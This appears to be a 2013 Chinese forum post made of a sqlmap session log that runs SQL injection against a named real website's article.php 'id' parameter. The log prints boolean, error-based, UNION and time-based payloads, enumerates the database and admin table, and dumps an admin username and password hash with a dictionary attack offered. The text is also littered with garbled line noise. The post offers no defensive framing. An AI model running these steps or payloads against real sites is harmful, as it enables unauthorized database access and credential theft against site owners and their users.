D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, C! _3 X. t" |) Wms "Mysql" --current-user /* 注解:获取当前用户名称
2 ~! \$ v: a- x8 J sqlmap/0.9 - automatic SQL injection and database takeover tool+ O$ P9 Q' m! @. v0 G0 N
http://sqlmap.sourceforge.net starting at: 16:53:54
) K0 K0 D e# B) t- r7 v[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, v+ F, E( z+ g
session file- A: Y# a. R8 p- [0 J" K
[16:53:54] [INFO] resuming injection data from session file
3 f% N2 N: ?) ~$ a/ ^; }[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* Y I. Z+ X, t[16:53:54] [INFO] testing connection to the target url
/ M k: _" r& Esqlmap identified the following injection points with a total of 0 HTTP(s) reque1 f# S3 X3 L& n( G$ f
sts:
. S W" B9 C5 q! D* e% `- ^( h---4 B; s1 Z, }+ L- h
Place: GET
1 e+ d2 O5 K7 ?Parameter: id
4 |, F0 F5 U+ x. |: [ Type: boolean-based blind( x* N. I. g5 ?( M J3 N8 T
Title: AND boolean-based blind - WHERE or HAVING clause
5 k, T/ O! f/ U7 `( C Payload: id=276 AND 799=799) F5 f+ |8 C( Z( {3 R
Type: error-based
0 c7 e8 h9 Z. g. a0 ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! R6 c1 k8 c j, X: S0 f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 @7 I1 |9 ?+ R! _' C# P& o/ f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# o" ^% E6 m3 [3 r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): l8 ~) G0 m2 p; S2 X) L* B
Type: UNION query
( S1 @ D7 u# X8 Q3 R! t+ y8 ~ Title: MySQL UNION query (NULL) - 1 to 10 columns
4 W. l2 g8 D7 @. J3 W) y9 h+ i Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 c4 k* ?2 e8 _$ o0 M# l- b) h9 W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, L& w% O7 b0 |& b zCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- B; p! u/ m8 D; b3 p6 v
Type: AND/OR time-based blind
9 N# @2 U" K t, L; l$ v1 J Title: MySQL > 5.0.11 AND time-based blind* n) y3 u' |/ S
Payload: id=276 AND SLEEP(5)
+ Q/ [! [( r9 @6 i7 W5 \0 ^---
7 b; D% @8 B7 {; R[16:53:55] [INFO] the back-end DBMS is MySQL9 _, F" t' m6 @# T$ E
web server operating system: Windows/ ]! \, S& }( C5 c/ b L
web application technology: Apache 2.2.11, PHP 5.3.05 @2 u( B* i2 \2 t* W% ]+ G( n
back-end DBMS: MySQL 5.0, P; ]( D# S2 `2 J# F
[16:53:55] [INFO] fetching current user
* H8 J% Y( n" g" k& R- i4 i6 `current user: 'root@localhost'
. }3 N. h; u& s3 l! c. N[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# B2 \ L+ H5 H7 y- [
tput\www.wepost.com.hk' shutting down at: 16:53:58: U% A$ P, z" ^* X/ @ s
- X# E- C/ R& h( _) p! K4 DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 L3 r. t$ P5 J9 l4 M
ms "Mysql" --current-db /*当前数据库% ?* C5 M0 b' V( m! h
sqlmap/0.9 - automatic SQL injection and database takeover tool
( g" a/ b* r8 d3 C; E- A' ~* L% X http://sqlmap.sourceforge.net starting at: 16:54:16
. h/ U" U6 d% M# z. \[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# s4 s. T# r: u
session file
) x, Q! Q0 o$ x9 O1 h2 ~. h[16:54:16] [INFO] resuming injection data from session file
% k3 a7 @1 k. L7 o, J. A% `[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
, k3 f5 U2 e- g: t[16:54:16] [INFO] testing connection to the target url
& v0 z5 J; P3 p+ M+ {( e5 n; |8 x% ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 S& V+ M/ t: y5 m5 u6 v7 c4 ~. r& W
sts:
l9 u. d1 A8 @2 j/ q---
; B8 A# N) h, l$ xPlace: GET. q/ d" T7 j* F- H3 D/ P9 D/ D' K
Parameter: id
2 W% e/ ]" r4 r* w Type: boolean-based blind7 K& v# m6 f) g5 J
Title: AND boolean-based blind - WHERE or HAVING clause0 [( m: [! Y1 T% m2 H9 r
Payload: id=276 AND 799=7996 _' X4 I, r( ?/ l f# U! F5 L
Type: error-based
) m0 r. O8 v% L' x6 w9 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause u9 N+ g$ y2 ^$ ~
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! |) h' b# P' v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ {) M4 B3 F; V8 c' y, Y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! x3 X+ [+ F9 G Type: UNION query2 r6 Z& P7 K; b% @3 V' H
Title: MySQL UNION query (NULL) - 1 to 10 columns
) S. H8 i# `% {8 [' O: E Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 _3 {# ^8 Y5 t/ n
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 |, M2 W1 d6 s gCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- f" e" R- c1 B' k- O h5 m# V- `
Type: AND/OR time-based blind+ G# p& t$ a+ P
Title: MySQL > 5.0.11 AND time-based blind
4 A" S3 z. ]0 G% c Payload: id=276 AND SLEEP(5)
$ [, _- R3 q& r6 y" [6 ~5 Y: ~---% F; E2 E! n+ ~. z
[16:54:17] [INFO] the back-end DBMS is MySQL
9 g) S# @6 C0 k1 q6 |/ Oweb server operating system: Windows
( g5 ~+ n' z! mweb application technology: Apache 2.2.11, PHP 5.3.0! f1 y3 ]0 c5 \- I; j9 \: A! |. u
back-end DBMS: MySQL 5.0
! T ^5 I! W' u1 `( f% W[16:54:17] [INFO] fetching current database
* z* m/ ]$ `) o) H" z: N8 icurrent database: 'wepost'
0 c5 o, J- i7 g# X- f& @[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 j- X1 L0 B( N* L# c9 c* ?
tput\www.wepost.com.hk' shutting down at: 16:54:18 s+ W2 k0 Y7 C, w: a
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. s& G* c0 `! V4 s( K0 |ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名/ l% D/ W( q: D& C) u
sqlmap/0.9 - automatic SQL injection and database takeover tool
! M0 q- x% o; O% A# a, h http://sqlmap.sourceforge.net starting at: 16:55:256 A( H3 b3 z' W3 B6 l& v
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
* f. p4 H& L/ h i5 @ session file1 k( O N8 p* W' `
[16:55:25] [INFO] resuming injection data from session file
- ^% m9 E( C) `( y6 {: s[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* c* o( U5 i/ W+ E5 y) f+ w) G
[16:55:25] [INFO] testing connection to the target url, f2 B6 x' V" E: G: N
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 d8 C1 i4 N$ k0 U% w: A! u f" dsts:7 W: r& H! b( h/ f
---3 I# j4 `2 s; H4 O
Place: GET
$ ^* a4 ]$ H& k, iParameter: id
: z! }+ m) B) O1 B6 O7 Z) v Type: boolean-based blind, x4 Z! o2 R) j4 }+ [8 L7 R! x
Title: AND boolean-based blind - WHERE or HAVING clause, r& b0 ^8 I$ }
Payload: id=276 AND 799=799 y4 Z. V6 T0 @+ L
Type: error-based1 A% G+ c+ D* ^, M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 `. | [3 c( u+ G/ a S M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ w$ S0 k& f x+ H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 z. V/ `. X) C7 R4 l5 E
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 K% `/ u" E+ L' G! d7 l) g
Type: UNION query' n! ~8 F+ d: A+ o
Title: MySQL UNION query (NULL) - 1 to 10 columns
* W6 b- e! Z! R, J* t9 _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ i5 X; s9 X+ z; A6 L% N5 L& Z. e( S(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. F" Q m* D5 ~! @& g" rCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 O7 ?1 k. v8 M0 z2 a
Type: AND/OR time-based blind
% C8 U0 Z: H: T Title: MySQL > 5.0.11 AND time-based blind
. J% N+ i9 {: |( s Payload: id=276 AND SLEEP(5)
/ D; t0 z& C8 M `---
! y# p0 ~# K* |$ u l5 V. y. Z[16:55:26] [INFO] the back-end DBMS is MySQL
" M" [! N' T$ M1 Y& F& Eweb server operating system: Windows
% u3 ~6 ?3 j7 J; d8 ] u2 nweb application technology: Apache 2.2.11, PHP 5.3.0+ y2 |3 N) @) X
back-end DBMS: MySQL 5.09 P y6 l8 X! b& K, J% a8 [8 u
[16:55:26] [INFO] fetching tables for database 'wepost'
7 q7 Z% n0 N" m' _+ u[16:55:27] [INFO] the SQL query used returns 6 entries v: b. I& f3 r" O2 Q! K7 p
Database: wepost
3 v7 U* @3 F5 r0 S[6 tables]
7 {; r3 ^1 H9 |7 |/ n: g; g# B+-------------+
$ H9 I1 r( a- D0 S2 N6 A| admin |: |+ p! L8 B" ?; r
| article |
( A) d) d+ p7 [0 X, C! s* d: P; {| contributor |0 u& O3 d% {4 O) d% T( p D
| idea |' c* i T+ w- z
| image |
' U' _' K! F8 E7 F$ N4 T* r% q0 L| issue |, m$ w' D1 @: X7 r8 A
+-------------+
# }( ~* _ H4 L. k& c0 P[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; A" N* u5 D- j. L, rtput\www.wepost.com.hk' shutting down at: 16:55:33
+ ]* G0 q4 a0 j4 W
# P4 r& r8 `5 j% c) ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 l/ U, ~5 o, _. @* o: _ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名2 h9 C) z6 w ^3 \9 B0 L1 s2 z' {
sqlmap/0.9 - automatic SQL injection and database takeover tool
) ?% Y4 E% O1 N. J4 ?; [8 W" k http://sqlmap.sourceforge.net starting at: 16:56:06" ?5 w: {7 b) M) m" A. W( ^
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
! @5 V4 t" A M9 d2 L! D4 l Qsts:
4 Z/ x7 ]) j/ ?- Y7 E---
" k/ V$ z2 I- k8 e6 E% E7 tPlace: GET* b: U- q% h3 x- a
Parameter: id
( S4 G. p( M: N# V Type: boolean-based blind
, X: m8 W5 y0 B8 `: N7 _+ o Title: AND boolean-based blind - WHERE or HAVING clause
6 i/ {2 ~6 `& L) U, t6 x Payload: id=276 AND 799=799$ y% M S$ H; p
Type: error-based* T% [ F' K6 K$ r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% v- } i% U8 G: o5 B4 E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 z8 J q7 B ^( D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% s0 N5 a! _: C& Q- H3 [' b- m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 P/ k: n' E- Q
Type: UNION query$ S6 E0 ^8 P2 g# a8 c: C
Title: MySQL UNION query (NULL) - 1 to 10 columns$ `: P5 i" [9 ]' H% q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ l. z- X M) H& _6 g2 e
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) o* _' ?$ w4 |5 }+ l DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
g$ E" c: A/ c I' m! A( k! _ Type: AND/OR time-based blind
! T1 [7 D5 _3 g. S* e7 B Title: MySQL > 5.0.11 AND time-based blind+ Z& ]# f- u( l Z+ h- K3 {
Payload: id=276 AND SLEEP(5)
! C3 M2 [5 _3 `& O% ^; D# E---$ G7 _7 e) b* u% P; Q0 `
web server operating system: Windows
$ A5 z s* R$ P. d9 f3 c( `web application technology: Apache 2.2.11, PHP 5.3.01 o& ^& w* u( Y) h$ B# k
back-end DBMS: MySQL 5.0
! k: L: H. [, C) G9 _/ S1 a* a; n[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se6 U- c6 d& e$ J4 l6 U
ssion': wepost, wepost, h% P: Q1 m; v, v3 l4 B: k3 ]" D* ~
Database: wepost
; O6 f0 M, i jTable: admin
- E8 X9 ~5 i# O* n( z& z[4 columns]
! E9 X: T4 p0 U. w0 b2 }4 `+----------+-------------+7 |0 S1 H1 c9 w
| Column | Type |! w: P. y$ n6 q. E; Q) K# T. X) J
+----------+-------------+8 T! D V9 P% V' n
| id | int(11) |
* J% w4 D# D$ h/ M* b| password | varchar(32) |
+ \" y) n, h: Y2 r5 L C' j| type | varchar(10) |
# ^3 v, c: x# x6 E9 U9 ?0 j6 W| userid | varchar(20) |
3 a* A9 b. u+ b( F9 e9 d; `+----------+-------------+4 h9 ~0 i# |/ d! r4 B( \
shutting down at: 16:56:19
! f+ m1 q8 q6 l. t$ g* B, B% H2 I$ ?9 D
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
$ E* r9 `9 [ ?+ P$ Rms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& T: s! _/ u/ p4 E7 ]3 z3 u sqlmap/0.9 - automatic SQL injection and database takeover tool6 L' E7 P: d" v
http://sqlmap.sourceforge.net starting at: 16:57:14- f4 y2 i% |7 U# @6 X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 i! `! Q$ I8 y) Csts:6 v w2 K" [, Z$ P
---
; D+ A. v% `# l) RPlace: GET0 y% b! P( C0 [& O
Parameter: id
6 l4 R5 Q$ B# u9 f: P- A" ~: A Type: boolean-based blind: Q N, v, w1 j( I
Title: AND boolean-based blind - WHERE or HAVING clause
" W, D1 `0 H$ _: ` Payload: id=276 AND 799=799, v. @, o; I2 S/ \! A. C' D) w
Type: error-based
5 ?* ^4 t$ L( H: S7 L: [5 h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( _0 v/ o7 _/ }4 I& u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* I1 P) X6 B+ |
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 t2 _8 b9 E6 j7 ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): u6 E* ^ N* Y/ o) D2 `) @
Type: UNION query% T) e1 _5 z+ E) K+ Y. ~) g* O
Title: MySQL UNION query (NULL) - 1 to 10 columns
# O1 H' q. H" h' R, O6 M Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" c% D4 F7 g: O @" W: [) y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 u# r% V2 T) J& r
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# E4 k/ T1 o2 c: J# U4 R Type: AND/OR time-based blind
^) K5 @! b$ Z% m! s2 \9 H; u6 K- O l2 ` Title: MySQL > 5.0.11 AND time-based blind
% y2 a4 [* M$ F5 \& U+ N Payload: id=276 AND SLEEP(5)
* C* D( l4 g. L0 O3 A% P# A---( \" u C- N6 c
web server operating system: Windows( F# {1 Y7 q- X$ \% w% j2 s
web application technology: Apache 2.2.11, PHP 5.3.0
* ^! T" Q. v+ x7 }back-end DBMS: MySQL 5.04 J: ~% S8 q3 s, z- g) h
recognized possible password hash values. do you want to use dictionary attack o
; h0 L8 J1 N, |* h8 B+ o# T, on retrieved table items? [Y/n/q] y
5 V# e, I5 [, ?' ?, q' pwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ d+ w9 O0 {2 o- O# Kdo you want to use common password suffixes? (slow!) [y/N] y+ n+ G0 `8 ~3 w Q+ G+ B k
Database: wepost
" h: d2 W+ k L/ Q, K" r" yTable: admin% }5 [1 a% [, c1 m% ?0 ?' P1 @- a
[1 entry]- w% f7 E& `. s( V
+----------------------------------+------------+% I. `7 f9 W2 l6 ^& o9 |
| password | userid |
) }+ o8 j( x5 d: i+----------------------------------+------------+
7 l' O: L) U/ C% H5 c' y( U| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |( K- S& A1 i# I6 f$ G* n, U# T
+----------------------------------+------------+7 |$ z3 t1 n/ c8 l2 v- A1 i, r
shutting down at: 16:58:147 H( d6 g: ~' |, X. O1 S
5 A% y, v+ N8 O; L) W/ G
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对